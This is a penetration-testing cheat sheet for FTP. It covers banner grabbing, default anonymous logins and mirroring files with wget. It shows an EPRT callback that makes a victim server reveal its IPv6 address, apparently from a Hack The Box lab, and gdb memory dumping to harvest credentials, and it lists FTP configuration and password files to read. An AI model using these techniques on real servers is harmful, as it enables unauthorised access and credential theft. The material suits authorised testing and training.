21 - FTP

Banner Grabbing

nc -vn <IP> 21
openssl s_client -connect somesite.com:21 -starttls ftp

Anonymous Login

anonymous : anonymous
anonymous :
ftp : ftp

Download All Files

wget -m ftp://anonymous:anonymous@10.10.10.98
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98

Force IPv6 Callback

RFC2428 inform about the function EPRT which can be used to connect to another host. The following are sample EPRT commands:

 EPRT |1|132.235.1.2|6275|
 EPRT |2|1080::8:800:200C:417A|5282|

EPRT can be used this to send a connection from a victim FTP server back to our attacking devices, in order to disclose the victims IPv6 address. EPRT isn't a valid "normal" FTP command, it is a RAW FTP command, so instead of using FTP you need to use telnet port 21.

$ telnet zetta.htb 21
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
USER 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
331 User 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5 OK. Password required
PASS 6OJCaGVYOJKtY3zFFQUTmtZNl8BHEuq5
EPRT |2|dead:beef:2::1008|4488|        // my IPv6 address
200-FXP transfer: from 10.10.14.10 to dead:beef:2::1008%160
200 PORT command successful
LIST
425 Could not open data connection to port 4488: Connection refused

Capture incoming IPv6 address with tcpdump.

$ tcpdump -i tun0 -vv ip6
tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:12:32.613603 IP6 (flowlabel 0x6bdb7, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:df29.37250 > kali.4488: Flags [S], cksum 0x64d3 (correct), seq 1305187145, win 28800, options [mss 1337,sackOK,TS val 374756922 ecr 0,nop,wscale 7], length 0
09:12:32.613626 IP6 (flowlabel 0xbe7b8, hlim 64, next-header TCP (6) payload length: 20) kali.4488 > dead:beef::250:56ff:feb9:df29.37250: Flags [R.], cksum 0xa938 (correct), seq 0, ack 1305187146, win 0, length 0

Victim IPv6 address: dead:beef::250:56ff:feb9:df29

Dumping Memory

Attach to FTP process and dump it's memory, in hope of finding credentials.

$ gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/<name>.mem <START_HEAD> <END_HEAD>
(gdb) q
$ strings /tmp/<name>.mem

// Alternative to 'info proc mappings' to get heap start-end address
(gdb) ! grep heap /proc/<PID>/maps

Interesting Files

/etc/ftpusers
/etc/ftpd.conf
/etc/proftpd.conf
/etc/proftpd/proftpd.conf
/etc/proftpd/ftpd.passwd
/etc/vsftpd.conf
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list